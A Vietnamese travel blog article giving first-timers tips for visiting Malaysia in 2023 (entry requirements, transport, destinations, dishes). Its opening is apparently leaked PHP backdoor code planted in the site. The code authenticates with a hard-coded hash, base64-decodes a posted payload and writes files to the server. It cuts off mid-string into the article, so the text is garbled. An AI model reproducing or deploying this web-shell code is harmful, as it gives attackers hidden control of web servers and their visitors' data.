function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Bí kíp du lịch Malaysia 2023 cho tín đồ lần đầu xuất ngoại

Bí kíp du lịch Malaysia 2023 cho tín đồ lần đầu xuất ngoại

08/02/2023 Đi Để Đến - Group

Du lịch Malaysia 2023 sẽ giúp bạn khám phá cảnh quan thiên nhiên đặc sắc và nét ẩm thực độc đáo, phong phú tại quốc gia được mệnh danh với cái tên là “châu Á” thu nhỏ. Tới đây, du khách không chỉ hiểu rõ hơn về lịch sử, kiến trúc của đất nước du lịch tuyệt đẹp này mà còn được làm quen với những người dân bản địa thân thiện, hiếu khách. Hãy cùng tìm hiểu về kinh nghiệm du lịch Malaysia 2023 dành cho các tín đồ xê dịch với dideden.com ngay nhé.

QUY ĐỊNH NHẬP CẢNH DU LỊCH MALAYSIA 2023

Để nhập cảnh vào Malaysia, du khách cần thực hiện một số yêu cầu bắt buộc:

  • Tải ứng dụng My Sejahtera về điện thoại 
  • Xuất trình một số giấy tờ cần thiết như hộ chiếu vacxin, kết quả xét nghiệm RT-PCR trong 72 giờ trước khởi hành
  • Thực hiện test nhanh tại sân bay
  • Khi hoàn tất các thủ tục trên thì du khách sẽ được cấp thẻ du lịch ngay trên ứng dụng My Sejahtera

DU LỊCH MALAYSIA MÙA NÀO?

Thời tiết ở Malaysia luôn ấm áp với đặc trưng của khí hậu nhiệt đới ẩm. Vì thế, hệ sinh thái của Malaysia hết sức phong phú và có rất nhiều địa điểm đẹp cho du khách tham quan. Nhiệt độ ở Malaysia dao động khoảng từ 30 – 33 độ và nhiệt độ thấp nhất tại đây rơi vào khoảng tầm 18 độ C.

Du khách đi du lịch Malaysia 2023 cũng cần lưu ý là tại một ngày nhất định thời tiết sẽ rất nóng, đặc biệt là trời có thể đổ mưa to bất chợt. Lời khuyên cho các du khách khi du lịch Malaysia 2023 là đi du lịch vào mùa khô. Dù nhiệt độ tại thời điểm này hơi cao tuy nhiên cũng là thời điểm ít các trận mưa gây cản trở cho việc tham quan của du khách. 

du lich malaysia 2023 - du lich mua kho

Thăm thú các địa điểm tham quan thú vị vào mùa khô tại Malaysia. Nguồn: Sưu tầm

DU LỊCH MALAYSIA 2023 NÊN ĐI THEO TOUR HAY ĐI TỰ TÚC

Với những du khách lần đầu xuất ngoại thì việc đi du lịch theo tour sẽ đem lại nhiều lợi ích hơn so với du lịch tự túc. Du lịch theo tour, các cơ sở du lịch sẽ giúp bạn trong việc đưa ra các thủ tục cần thiết và các lưu ý để bạn có thể chuẩn bị đầy đủ trước khi bắt đầu chuyến hành trình của mình. 

Hơn nữa, du lịch theo tour ở Malaysia chi phí sẽ rẻ hơn rất nhiều so với du lịch tự túc. Bởi các chi phí như máy bay, nơi lưu trú và vé tham quan đã đều bao gồm trong gói dịch vụ. Các cơ sở du lịch sẽ có được mức giá tốt nhất về các chi phí nêu trên. Chi phí đi du lịch theo tour ít khi phát sinh như khi đi du lịch tự túc. Đôi khi đi du lịch tự túc, nếu bạn không hiểu rõ về địa điểm bạn muốn đến, bạn rất có thể mất thêm 1 khoản tiền đáng kể khi đi tham quan. 

Đi du lịch theo tour sẽ luôn đảm bảo sự an toàn cao hơn so với du lịch tự túc. Du khách đi du lịch Malaysia 2023 theo tour sẽ đi cùng đoàn đông người có trưởng đoàn và hướng dẫn viên du lịch. Do vậy, khi gặp vấn đề gì, họ sẽ là người giải quyết và hỗ trợ bạn trong suốt chuyến hành trình. Vì vậy khi du lịch Malaysia 2023 với những du khách chưa từng xuất ngoại hay chưa từng đến Malaysia có thể trải nghiệm đi tour Malaysia tại các cơ sở du lịch uy tín.

du lich malaysia 2023 - Malaysia

Du lịch theo tour đến các bờ biển đẹp nhất tại Malaysia. Nguồn: Sưu tầm

>>> Xem thêm: 5+ kinh nghiệm du lịch Singapore Malaysia

PHƯƠNG TIỆN DI CHUYỂN KHI DU LỊCH MALAYSIA 2023

1. Di chuyển từ Việt Nam đến Malaysia

Các sân bay quốc tế tại Việt Nam hiện nay như sân bay Tân Sơn Nhất, Nội Bài đều có chuyến bay đến Kuala Lumpur. Một số hãng hàng không mà bạn có thể tham khảo khi du lịch Malaysia 2023 như Vietnam Airlines, Malaysia Airlines, Vietjet, Jetstar. 

Ngoài ra, một số du khách cũng lựa chọn đi du lịch kết hợp giữa nhiều quốc gia như đi từ Việt Nam – Singapore – Malaysia. Khi du khách đến Singapore, du khách có thể đi xe bus để di chuyển sang miền Nam của Malaysia, và đi tàu điện để đến Kuala Lumpur. 

2. Di chuyển trong nội địa Malaysia

Phương tiện di chuyển bên trong nội địa Malaysia tương đối đa dạng. Khi du lịch Malaysia 2023 theo tour thì khi đến đây bạn không cần lo lắng quá nhiều về phương tiện bởi tour sẽ có xe du lịch đưa đón bạn. Còn với những du khách du lịch tự túc, bạn có thể đi một số loại phương tiện sau đây:

Taxi

Taxi là phương tiện được nhiều du khách sử dụng vì giá cả cũng không quá đắt đỏ. Bạn có thể đi taxi để di chuyển đến các trạm tàu điện hay xe buýt khi du lịch Malaysia 2023. Khi đi taxi từ sớm trong khoảng từ 12 giờ đêm đến 6 giờ sáng, bạn có thể sẽ phải trả phụ phí đến 50%. 

Bus

Go KL City Bus là phương tiện di chuyển không mất phí tại thủ đô Malaysia. Xe bus đi qua các tuyến đường chính trong khu du lịch như Chinatown, Bukit Bintang. Đây đều là những nơi có rất nhiều các địa điểm tham quan, khu trung tâm thương mại và vui chơi giải trí sầm uất. 

Tàu điện

Hệ thống tàu điện ở Malaysia phát triển và do đó, du khách khi du lịch Malaysia 2023 ở đây có thể lựa chọn. Du khách khi đi từ Kuala Lumpur đến các vùng ngoại ô hay nội ô bằng tàu điện thì giá cả cũng đều rẻ. Để di chuyển bằng các phương tiện công cộng như xe bus hay tàu điện một cách thuận tiện, du khách nên sử dụng thẻ Myrapid.

du lich malaysia 2023 - tau dien

Tàu điện là phương tiện công cộng được nhiều du khách lựa chọn. Nguồn: Sưu tầm

ĐỊA ĐIỂM THAM QUAN KHI ĐI DU LỊCH MALAYSIA

1. Du lịch Malaysia 2023 – Kuala Lumpur

Kuala Lumpur là thủ đô của Malaysia với nhiều khu trung tâm mua sắm sầm uất. Nơi đây còn rất nổi tiếng với tòa tháp đôi Petronas Twin Towers và các công trình kiến trúc tuyệt đẹp. Du khách đi du lịch Malaysia còn có thể khám phá khu Chinatown và thưởng thức ẩm thực của người Hoa ngay bên trong trung tâm thành phố. 

Du lịch tại thủ đô của Malaysia, du khách sẽ được ghé thăm vô vàn các điểm tham quan thú vị như vườn thú quốc gia, nhà hát quốc gia, bảo tàng quốc gia, động đá vôi Batu Caves. Nếu du khách đã quá nhàm chán với khung cảnh thủ đô nhộn nhịp thì có thể đi xe lên khu cao nguyên Genting Highlands. Đây cũng là điểm đến nghỉ mát có sức hút đặc biệt với du khách thập phương. 

2. Du lịch Malaysia 2023 – Quần đảo Langkawi

Quần đảo gồm có 99 đảo nhỏ hơn và nằm bên trong biển Andaman. Nước biển trong xanh cùng rừng nguyên sinh với đa dạng loài động vật khiến nơi đây có sức hút lạ kỳ. Thiên đường biển đảo này luôn là điểm đến tham quan nhất định phải đi đặc biệt là trong chuyến du lịch Malaysia 2023. Một số bãi biển mà du khách có thể nghỉ dưỡng đó là Pantai Kok, Tanjung Rhu, Burau Bay,…

du lich malaysia 2023 - langkawi

Dạo bước tại cầu trên không của Langkawi. Nguồn: Sưu tầm

3. Melaka

Melaka là di sản được UNESCO công nhận. Tại Melaka, du khách có thể tham quan các địa điểm nổi bật như Bảo tàng Baba, đền Cheng Hoon Teng, quảng trường Dutch Square, đền Poh San Teng, đền Geok Hu Keng. 

>>> Xem thêm: Săn khách sạn “vạn người mê” ở Malaysia

4. George Town

George Town là di sản mang đậm dấu ấn của văn hóa Trung Hoa và Hồi giáo. Các địa điểm tham quan ở khu George Town mà du khách không nên bỏ qua trong chuyến du lịch Malaysia 2023 là tòa tháp đồng hồ, chùa Wat Chaiyamangalaram, và các nhà thờ. Đồ ăn tại George Town chiếm trọn tình yêu của du khách. Đến đây, bạn sẽ được khám phá ẩm thực Trung Hoa, phương Tây và Malaysia. 

5. Cameron Highlands

Nếu du khách muốn tìm kiếm địa điểm có nhiều cao nguyên, chắc chắn không thể bỏ qua: đỉnh núi Gunung Brinchang, rừng rêu, thung lũng Blue Valley hay Rose Valley. Du lịch ở cao nguyên sẽ đem đến cho du khách trải nghiệm khác biệt. Không khí trong lành cùng các hoạt động trải nghiệm hấp dẫn sẽ không làm du khách thất vọng. 

6. Động Batu

Động Batu có vị trí cách thủ đô Kuala Lumpur 15km. Hệ thống động ở đây vô cùng đa dạng với vẻ đẹp riêng biệt. Ba hang nổi tiếng nhất tại động Batu: triển lãm nghệ thuật, bảo tàng, hang thờ. Nếu đi du lịch Malaysia 2023 vào khoảng tháng 1 và tháng 2 thì du khách còn được tham gia lễ hội văn hóa của người Ấn Độ. 

du lich malaysia 2023 - dong Batu

Động Batu với sắc màu rực rỡ là địa điểm check in nhiều cặp đôi yêu thích. Nguồn: Sưu tầm

7. Ipoh

Ipoh là địa điểm có sức hút đặc biệt với những tòa nhà có kiến trúc cổ kính như nhà ga xe lửa Ipoh Railway Station, tòa nhà ủy ban Ipoh Town Hall, các hang động Perak Tong, rừng mưa Ulu Geroh, lâu đài Kellie’s Castle, đền Kovil. 

Đây đều là những điểm đến mà du khách chắc chắn nên ghé thăm ít nhất một lần khi đi du lịch Malaysia 2023. Một số địa điểm có thể yêu cầu vé tham quan có trả phí. Do đó, du khách du lịch tự túc cần tìm hiểu thật kỹ trước khi đến.

8. Kuantan

Kuantan là thành phố lớn gồm nhiều bãi biển đẹp đến mê đắm. Đến với Kuantan, du khách có thể tắm biển và trải nghiệm các hoạt động vui chơi trên nước tại bãi gió Balok, bãi đá đen. Ngoài ra, du khách cũng có thể thưởng thức hải sản tươi sống thơm ngon tại làng chài Beserah. 

Thành phố không chỉ có bãi tắm đẹp mà còn có thác Berkelah và nhà thờ hồi giáo. Du khách có thể dành thời gian một đến hai ngày để tham quan các địa điểm này để hiểu hơn về văn hóa Hồi giáo và ngắm nhìn thiên nhiên tại Malaysia. 

>>> Xem thêm: Hành trình du lịch Singapore Malaysia Indonesia 6 ngày 5 đêm

CÁC MÓN ĂN ĐẶC SẢN TẠI MALAYSIA

1. Nasi Lemak

Món ăn với cái tên hết sức đặc biệt này bao gồm rất nhiều nguyên liệu là cơm nấu với nước cốt dừa, sốt tôm, cá chiên, trứng, lạc rang. Món ăn này thường được ăn cùng với thịt gà sốt cay làm tăng hương vị. Nasi Lemak là món ăn chắc chắn du khách phải thưởng thức.

du lich malaysia 2023 - nasi lemak

Món cơm được trình bày đẹp mắt cùng nhiều món ăn kèm khác nhau. Nguồn: Sưu tầm

2. Bún Laksa

Bún Laksa là món bún được ăn cùng với rất nhiều loại topping khác nhau có thể kể đến như thịt gà, chả cá, trứng, sò huyết, giá, đậu phụ. Tùy nơi bán, topping sẽ có sự thay đổi đáng kể tuy nhiên vẫn sẽ giữ được nguyên vị nước dùng đặc sệt và đậm đà từ các loại gia vị. Đặc biệt món ăn này có vị chua cay không lẫn vào đâu do phần nước chủ yếu là nấu từ quả me. 

3. Cơm gà Hải Nam

Cơm gà Hải Nam là một trong những món ăn nổi tiếng có sự kết hợp của nét ẩm thực Malaysia và Singapore. Cơm gà được chế biến đơn giản từ nguyên liệu là gà luộc và cơm dầu cùng các loại gia vị như tương ớt, gừng giã nhỏ và nước tương. 

Điểm nhấn của món ăn nằm ở phần nước sốt ăn kèm với lát dưa chuột thái mỏng. Cơm gà Hải Nam là món ăn không quá cầu kỳ nhưng lại là niềm tự hào của người dân nhập cư tại Malaysia. 

du lich malaysia 2023 - com ga hai nam

Cơm gà Hải Nam là món ăn nên thử khi đến với Malaysia. Nguồn: Sưu tầm

4. Cơm lá chuối Malaysia

Món cơm lá chuối là sự kết hợp giữa cơm trắng và ăn kèm với nhiều loại thức ăn như thịt, cá, nước sốt. Món ăn được bày trên lá chuối mang lại cảm giác vừa gần gũi vừa mới lạ với những du khách khi lần đầu nếm thử. Các thực khách khi ăn món ăn này chủ yếu sẽ ăn bốc. Đây cũng là một trải nghiệm hết sức thú vị khi thưởng thức ẩm thực tại Malaysia. 

>>> Xem thêm: Tour Singapore Malaysia 5 ngày 4 đêm: Điểm nhấn hành trình

Trên đây là các kinh nghiệm du lịch Malaysia 2023 dành cho các tín đồ lần đầu xuất ngoại. Mong rằng từ các chia sẻ hữu ích của dideden.com, du khách đã có thêm thông tin cần thiết cho chuyến du lịch sắp tới của mình. Nếu du khách muốn khám phá trọn vẹn Malaysia với giá siêu rẻ thì liên hệ 1900 3398 để được tư vấn và hỗ trợ chi tiết. 

ĐĂNG KÍ ĐẶT TOUR DU LỊCH MALAYSIA

Like Đi Để Đến trên fanpage và follow trên twitter để cập nhật thêm nhiều thông tin thú vị cho bạn!

  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]